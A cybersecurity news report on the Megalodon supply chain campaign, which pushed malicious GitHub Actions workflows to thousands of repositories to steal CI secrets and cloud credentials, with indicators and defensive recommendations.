Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows
Cybersecurity researchers have disclosed Megalodon, an automated supply chain attack that pushed 5,718 malicious commits to 5,561 GitHub repositories in just six hours, stealing CI secrets, cloud credentials, and API keys.
Cybersecurity researchers have disclosed details of a sophisticated automated supply chain campaign dubbed Megalodon that pushed 5,718 malicious commits to 5,561 GitHub repositories within a six-hour window on May 18, 2026 — one of the broadest single-day repository poisoning events ever recorded.
How the Attack Unfolded
Between 11:36 a.m. and 5:48 p.m. UTC, the threat actor injected malicious GitHub Actions workflow files containing base64-encoded bash payloads into thousands of public repositories. The attacker rotated through four seemingly innocent author names — build-bot, auto-ci, ci-bot, and pipeline-bot — along with seven generic commit messages designed to blend in with routine CI maintenance activity.
Two Distinct Payload Variants
Researchers identified two variants in the attack:
- SysDiag (mass variant): Added a new GitHub Actions workflow triggered on every push and pull request, maximizing automated execution across forks and contributors.
- Optimize-Build (targeted variant): Replaced existing workflows with
workflow_dispatchtriggers, creating dormant backdoors that the attacker could fire on demand via the GitHub API — even after the initial injection was discovered.
What Was Stolen
The malicious payloads harvested a wide range of sensitive data from CI/CD environments, including:
- CI environment variables and secrets
- AWS instance role credentials via IMDSv2 metadata queries
- Google Cloud and Microsoft Azure instance metadata
- API keys, database connection strings, JWTs, and PEM private keys
- Cloud tokens matched against more than 30 secret regex patterns
- SSH keys and OIDC tokens
All harvested data was exfiltrated to a command-and-control server at 216.126.225.129:8443.
Notable Victim: @tiledesk/tiledesk-server
Among the confirmed impacted packages is @tiledesk/tiledesk-server, a widely used open-source customer engagement platform. The package bundled a base64-encoded bash payload within a GitHub Actions workflow file, demonstrating that even well-maintained open source projects were caught in the sweep.
Supply Chain Implications
The Megalodon campaign underscores a critical risk in modern software delivery: CI/CD pipelines are high-value targets precisely because they run automatically with broad access to secrets, cloud credentials, and deployment infrastructure. The dormant workflow_dispatch backdoor variant is particularly concerning — it survives cleanup efforts and can be triggered silently long after the initial attack is noticed.
Recommendations
Security teams should immediately audit GitHub Actions workflow files for unauthorized additions or replacements, rotate any secrets exposed in CI environments since May 18, enforce OIDC-based short-lived credentials instead of long-lived secrets in CI, and implement branch protection rules that require review before workflow files can be merged.
Source: The Hacker News | Cybernews
